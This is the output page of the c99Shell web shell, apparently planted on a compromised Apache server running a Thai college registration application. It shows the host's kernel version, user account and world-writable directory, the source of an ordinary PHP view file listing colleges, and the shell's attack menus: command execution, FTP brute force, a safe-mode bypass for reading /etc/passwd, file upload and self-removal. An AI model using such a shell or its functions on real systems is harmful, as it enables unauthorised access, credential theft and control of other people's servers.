!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/views/eregis/   drwxrwxrwx
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_collegeTable.php (1.82 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<script language="JavaScript">
function ReturnValue(clgCode,clgName,clgNameE,clgAddr,clgPhoneNo)
{
    window.opener.document.myform1.elements["clgCode"].value = clgCode;
    window.opener.document.myform1.elements["clgName"].value = clgName;
    window.opener.document.myform1.elements["clgNameE"].value = clgNameE;
    window.opener.document.myform1.elements["clgAddr"].value = clgAddr;
    window.opener.document.myform1.elements["clgPhoneNo"].value = clgPhoneNo;
    window.close();
}
</script>
<table width="100%">
    <tr><td><table class="headCol">
        <tr> 
            <th class="seqCol">รหัสวิทยาลัย</th>
            <th>ชื่อวิทยาลัย</th>
        </tr>
<?php
    $i 
0;
    if(isset(
$rs_clg) && $rs_clg->num_rows()) {
        foreach(
$rs_clg->result() as $row) {
            echo 
"<tr onmouseover=\"bgColor='".$tr_color_even."'\" onmouseout=\"bgColor='".$this->config->item("rg_mouseout")."'\">";
?>
            <td align="center"><span class="style:CURSOR: hand" onClick='ReturnValue("<?php echo $row->clgCode;?>","<?php echo $row->clgName;?>","<?php echo $row->clgNameE;?>","<?php echo $row->clgAddr;?>","<?php echo $row->clgPhoneno;?>")'><?php echo $row->clgCode;?></span></td>
            <td class="indent"><span class="style:CURSOR: hand" onClick='ReturnValue("<?php echo $row->clgCode;?>","<?php echo $row->clgName;?>","<?php echo $row->clgNameE;?>","<?php echo $row->clgAddr;?>","<?php echo $row->clgPhoneNo;?>")'><?php echo $row->clgName;?></span></td>
        </tr>
<?php
            $i
++;
        }
    } else {
?>
        <tr>
            <td colspan="2" align="center"><span class="error">** ไม่ปรากฏรายการดังกล่าวในฐานข้อมูล **</span></td>
        </tr>
<?php
    
}
?>
    </table></td></tr>
    <tr>
        <td align="right" colspan="2"><font size="2">รวม <?php echo $i;?> รายการ</font></td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0062 ]--